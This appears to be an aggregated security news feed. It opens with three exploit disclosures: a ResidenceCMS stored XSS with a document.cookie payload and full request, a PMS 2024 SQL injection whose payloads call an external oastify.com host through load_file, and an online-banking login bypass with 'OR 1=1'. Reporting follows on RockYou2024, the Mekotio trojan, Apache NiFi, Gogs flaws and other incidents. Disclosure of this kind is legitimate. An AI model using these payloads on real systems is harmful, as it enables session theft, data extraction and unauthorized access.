ResidenceCMS versions 2.10.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form# Date: 8-7-2024# Category: Web Application# Exploit Author: Jeremia Geraldi Sihombing# Version: 2.10.1# Tested on: Windows# CVE: CVE-2024-39143Description:----------------A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered..Steps to reproduce-------------------------1. Login as a low privilege user with property edit capability.2. Create or Edit one of the user owned property (We can user the default property owned by the user).3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not.Vulnerable parameter name: property[property_description][content]Example Payload: <img src="x" onerror="alert(document.cookie)">4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account.Burp Request-------------------POST /en/user/property/7/edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 1111Origin: http://localhostConnection: keep-aliveReferer: http://localhost/en/user/property/7/editCookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=falseUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=1property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

ResidenceCMS 2.10.1 Cross Site Scripting

PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00

PMS 2024 1.0 SQL Injection

Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123    Vuln code:/classes/Login.phpVuln parameter:username    public function login(){    extract($_POST);    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");    if($qry->num_rows > 0){      foreach($qry->fetch_array() as $k => $v){        if(!is_numeric($k) && $k != 'password'){          $this->settings->set_userdata($k,$v);        }      }      $this->settings->set_userdata('login_type',1);    return json_encode(array('status'=>'success'));    }else{    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));    }  }

Simple Online Banking System 1.0 SQL Injection

A list, known as RockYou2024, of almost 10 billion passwords has been released on a hacking forum. What are the dangers?

On a popular hacking form, a user has leaked a file that contains 9,948,575,739 unique plaintext passwords. The list appears to be a compilation of passwords that were obtained during several old and more recent data breaches.

The list is referred to as RockYou2024 because of its filename, rockyou.txt.

To cybercriminals the list has some value because it contains real-world passwords. This means if an attacker tried this list of passwords to try to break into an account (known as a brute force attack) they’s be more likely to get in than just trying a list of any old letters and words. However, it’s highly unlikely that there are any services or websites that would allow anyone to try such an enormous number of passwords, so it’s really only useful to attackers who have stolen a password database and are trying to crack its passwords offline, on their own computer.

Another possible use for cybercriminals is to combine the list with data from other breaches, such as combinations of usernames and passwords, which could get results if the password has been reused. If the cybercriminals also have a list that contains hashed passwords, they could even try to match the hash values of the passwords.

Having the actual password makes an attack a lot easier than when you’re trying a pass-the-hash attack, where an attacker tries to authenticate to a remote server or service by using the hash of a user’s password. However, this only works on services that are vulnerable to pass-the-hash attacks, instead of requiring the associated plaintext password as is normally the case.

To cut a long story short, if you don’t reuse passwords and never use “simple” passwords, like single words, then this release should not concern you. If you use multi-factor authentication (MFA), and you should everywhere you can, there’s also no reason to worry about this.

Malwarebytes has a free tool for you to find out how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 &#8216;RockYou2024&#8217;: Nearly 10 billion passwords leaked online 

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).
That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.
Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz).

That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware.

Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal with an aim to steal banking credentials.

First documented by ESET in August 2020, it's part of a tetrade of banking trojans targeting the region Guildma, Javali, and Grandoreiro, the latter of which was dismantled by law enforcement earlier this year.

"Mekotio shares common characteristics for this type of malware, such as being written in Delphi, using fake pop-up windows, containing backdoor functionality and targeting Spanish- and Portuguese-speaking countries," the Slovakian cybersecurity firm said at the time.

The malware operation suffered a blow in July 2021 when Spanish law enforcement agencies arrested 16 individuals belonging to a criminal network in connection with orchestrating social engineering campaigns targeting European users that delivered Grandoreiro and Mekotio.

Attack chains involve the use of tax-themed phishing emails that aim to trick recipients into opening malicious attachments or clicking on bogus links that lead to the deployment of an MSI installer file, which, in turn, makes use of an AutoHotKey (AHK) script to launch the malware.

It's worth noting that the infection process marks a slight deviation from the one previously detailed by Check Point in November 2021, which made use of an obfuscated batch script that runs a PowerShell script to download a second-stage ZIP file containing the AHK script.

Once installed, Mekotio harvests system information and establishes contact with a command-and-control (C2) server to receive further instructions.

It's main objective is to siphon banking credentials by displaying fake pop-ups that impersonate legitimate banking sites. It can also capture screenshots, log keystrokes, steal clipboard data, and establish persistence on the host using scheduled tasks.

The stolen information can then be used by the threat actors to gain unauthorized access to users' bank accounts and perform fraudulent transactions.

"The Mekotio banking trojan is a persistent and evolving threat to financial systems, especially in Latin American countries," Trend Micro said. "It uses phishing emails to infiltrate systems, with the goal of stealing sensitive information while also maintaining a strong foothold on compromised machines."

The development comes as Mexican cybersecurity firm Scitum disclosed details of a new Latin American banking trojan codenamed Red Mongoose Daemon that, similar to Mekotio, utilizes MSI droppers distributed via phishing emails masquerading as invoices and tax notes.

"The main objective of Red Mongoose Daemon is to steal victims' banking information by spoofing PIX transactions through overlapping windows," the company said. "This trojan is aimed at Brazilian end users and employees of organizations with banking information."

"Red Mongoose Daemon has capabilities for manipulating and creating windows, executing commands, controlling the computer remotely, manipulating web browsers, hijacking clipboards, and impersonating Bitcoin wallets by replacing copied wallets with the ones used by cybercriminals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Experts Warn of Mekotio Banking Trojan Targeting Latin American Countries

Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.

Skip to content

**Navigation Menu**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-37389

**Apache NiFi vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jul 8, 2024 to the GitHub Advisory Database • Updated Jul 8, 2024

**Package**

maven org.apache.nifi:nifi-web-ui (Maven)

**Affected versions**

\>= 1.10.0, < 1.27.0

\>= 2.0.0-M1, < 2.0.0-M4

**Patched versions**

1.27.0

2.0.0-M4

**Description**

Published to the GitHub Advisory Database

Jul 8, 2024

GHSA-h658-qqv9-qwv8: Apache NiFi vulnerable to Cross-site Scripting

A list of topics we covered in the week of July 1 to July 7 of 2024

July 5, 2024 - The cybercriminals behind the Ticketmaster data breach are giving away free Taylor Swift concert tickets.

July 4, 2024 - Authy users have been warned that their phone numbers have been obtained by cybercriminals that abused an unsecured API endpoint.

July 3, 2024 - Buy now and pay later provider Affirm has notified the SEC that customer data of its card users was compromised in the Evolve data breach.

July 2, 2024 - It turns out that a breach at the Prudential impacted a lot more people than was initially thought. The company is now offering identity monitoring to affected customers.

July 1, 2024 - An Australian man was arrested for alleged evil twin attacks. What are they and what can you do about them?

 A week in security (July 1 &#8211; July 7) 

Four unpatched security flaws, including three critical ones, have been disclosed in the Gogs open-source, self-hosted Git service that could enable an authenticated attacker to breach susceptible instances, steal or wipe source code, and even plant backdoors.
The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below -

CVE-2024-39930 (CVSS

Vulnerability / Software Security

Four unpatched security flaws, including three critical ones, have been disclosed in the Gogs open-source, self-hosted Git service that could enable an authenticated attacker to breach susceptible instances, steal or wipe source code, and even plant backdoors.

The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below -

*   **CVE-2024-39930** (CVSS score: 9.9) - Argument injection in the built-in SSH server
*   **CVE-2024-39931** (CVSS score: 9.9) - Deletion of internal files
*   **CVE-2024-39932** (CVSS score: 9.9) - Argument injection during changes preview
*   **CVE-2024-39933** (CVSS score: 7.7) - Argument injection when tagging new releases

Successful exploitation of the first three shortcomings could permit an attacker to execute arbitrary commands on the Gogs server, while the fourth flaw allows attackers to read arbitrary files such as source code, and configuration secrets.

In other words, by abusing the issues, a threat actor could read source code on the instance, modify any code, delete all code, target internal hosts reachable from the Gogs server, and impersonate other users and gain more privileges.

That said, all four vulnerabilities require that the attacker be authenticated. Furthermore, triggering CVE-2024-39930 necessitates that the built-in SSH server is enabled, the version of the env binary used, and the threat actor is in possession of a valid SSH private key.

"If the Gogs instance has registration enabled, the attacker can simply create an account and register their SSH key," the researchers said. "Otherwise, they would have to compromise another account or steal a user's SSH private key."

Gogs instances running on Windows are not exploitable, as is the Docker image. However, those running on Debian and Ubuntu are vulnerable due to the fact that the env binary supports the "--split-string" option.

According to data available on Shodan, around 7,300 Gogs instances are publicly accessible over the internet, with nearly 60% of them located in China, followed by the U.S., Germany, Russia, and Hong Kong.

It's currently not clear how many of these exposed servers are vulnerable to the aforementioned flaws. SonarSource said it does not have any visibility into whether these issues are being exploited in the wild.

The Swiss cybersecurity firm also pointed out that the project maintainers "did not implement fixes and stopped communicating" after accepting its initial report on April 28, 2023.

In the absence of an update, users are recommended to disable the built-in SSH server, turn off user registration to prevent mass exploitation, and consider switching to Gitea. SonarSource has also released a patch that users can apply, but noted it hasn't been extensively tested.

The disclosure comes as cloud security firm Aqua discovered that sensitive information such as access tokens and passwords once hard-coded could remain permanently exposed even after removal from Git-based source code management (SCM) systems.

Dubbed phantom secrets, the issue stems from the fact that they cannot be discovered by any of the conventional scanning methods – most of which look for secrets using the "git clone" command – and that certain secrets are accessible only via "git clone --mirror" or cached views of SCM platforms, highlighting the blind spots that such scanning tools may miss.

"Commits remain accessible through 'cache views' on the SCM," security researchers Yakir Kadkoda and Ilay Goldman said. "Essentially, the SCM saves the commit content forever."

"This means that even if a secret containing commit is removed from both the cloned and mirrored versions of your repository, it can still be accessed if someone knows the commit hash. They can retrieve the commit content through the SCM platform's GUI and access the leaked secret."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Unpatched Flaws Disclosed in Popular Gogs Open-Source Git Service

Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia's state communications watchdog Roskomnadzor, Russian news media reported.
This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut

Privacy / Internet Censorship

Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia's state communications watchdog Roskomnadzor, Russian news media reported.

This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut down all its Russian servers in March 2019.

"Apple's actions, motivated by a desire to retain revenue from the Russian market, actively support an authoritarian regime," Red Shield VPN said in a statement. "This is not just reckless but a crime against civil society."

In a similar notice, Le VPN said the takedown was carried out in accordance with No. 7 of Article 15.1 of the Federal Law dated July 27, 2006, No. 149-FZ "On Information, Information Technologies and Information Protection" and that its app was removed even before it received the official notice from the watchdog.

To that end, the VPN services have been included in the "Unified register" of internet resources prohibited for public distribution in Russia.

"This event marks a significant step in Roskomnadzor's ongoing efforts to control internet access and content within Russian territory," it said.

To counter the widespread crackdown, Le VPN has since launched an alternative service called Le VPN Give that it says "allows you to connect to our secret servers using third-party open-source software and obfuscated VPN connections."

The development is part of a series of censorship moves Kremlin has announced since the start of the Russo-Ukrainian war in February 2022 that has resulted in the blockade of several media outlets as well as social media apps such as Facebook, Instagram, and X.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Removes VPN Apps from Russian App Store Amid Government Pressure

Plus: Researchers uncover a new way to expose CSAM peddlers, OpenAI suffered a secret cyberattack, cryptocurrency thefts jump in 2024, and Twilio confirms hackers stole 33 million phone numbers.

Proton, the company behind Proton Mail, launched an end-to-end encrypted alternative to Google Docs, seeking to compete with the cloud giant on privacy. We broke down how Apple is taking a similar approach with its implementation of AI, using a system it calls Private Cloud Compute in its new Apple Intelligence features.

In other news, we dug into how the US bans on TikTok and Kaspersky software, despite their national security justifications, pose a threat to internet freedom. We went inside a crash course for US diplomats on cybersecurity, privacy, surveillance, and other digital threats. And we published an in-depth investigation into the origins of the world’s most popular 3D-printed gun, which revealed that its creator was a self-described “incel” with fantasies of right-wing terror.

But that’s not all. Each week, we round up the security news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

The giant hack against Ticketmaster may have taken another twist. In June, criminal hackers claimed they had stolen 560 million people’s information from the ticketing company owned by Live Nation. The company has since confirmed a breach, saying its information was taken from its Snowflake account. (More than 165 Snowflake customers were impacted by attacks on the cloud storage company that exploited a lack of multi-factor authentication and stolen login details).

Now in a post on cybercrime marketplace BreachForums, a hacker going by the name of Sp1d3rHunters is threatening to publish more data from Ticketmaster. The account claims to be sharing 170,000 ticket barcodes for upcoming Taylor Swift gigs in the US during October and November. The hacker demanded Ticketmaster “pay us $2million USD” or it will leak “680 million” users’ information and publish millions more event barcodes, including for concerts by artists such as Pink and Sting, and sporting events such as NFL games and F1 races.

The claims appear to be dubious, however, as Ticketmaster's barcodes aren't static, according to the company. “Ticketmaster’s SafeTix technology protects tickets by automatically refreshing a new and unique barcode every few seconds so it cannot be stolen or copied,” a Ticketmaster spokesperson tells WIRED in a statement. The spokesperson adds that the company has not paid any ransom or engaged with the hackers’ demands.

Hacker groups are known to lie, exaggerate, and overinflate their claims as they try to get victims to pay. The 680 million customers that Sp1d3rHunters claimed to have data on is higher than the original figure provided when the Ticketmaster breach was first claimed, and neither number has been confirmed. Even if victims do decide to pay, hackers can still keep the data and try to extort companies for a second time.

Despite the breach at Ticketmaster originally being publicized in June, the company has only recently begun emailing customers alerting them to the incident, which happened between April 2 and May 18 this year. The company says the database accessed may include emails, phone numbers, encrypted credit card information, and other personal information.

**Stolen Login Details Can Unmask Child Abuse Viewers, Researchers Say**

In recent years, there’s been a sharp uptick in cybercriminals deploying infostealers. This malware can grab all of the login and financial details that someone enters on their machine, which hackers then sell to others who want to exploit the information.

Cybersecurity researchers at Recorded Future have now published proof-of-concept findings showing these stolen login details can be used to potentially track down people visiting dark-web child sexual abuse material (CSAM) sites. Within infostealer logs, the researchers say they were able to find thousands of login details for known CSAM websites, which they could then cross-reference with other details and identify the potential real-world names connected to the abusive website logins. The researchers reported details of individuals to law enforcement.

Tag

#auth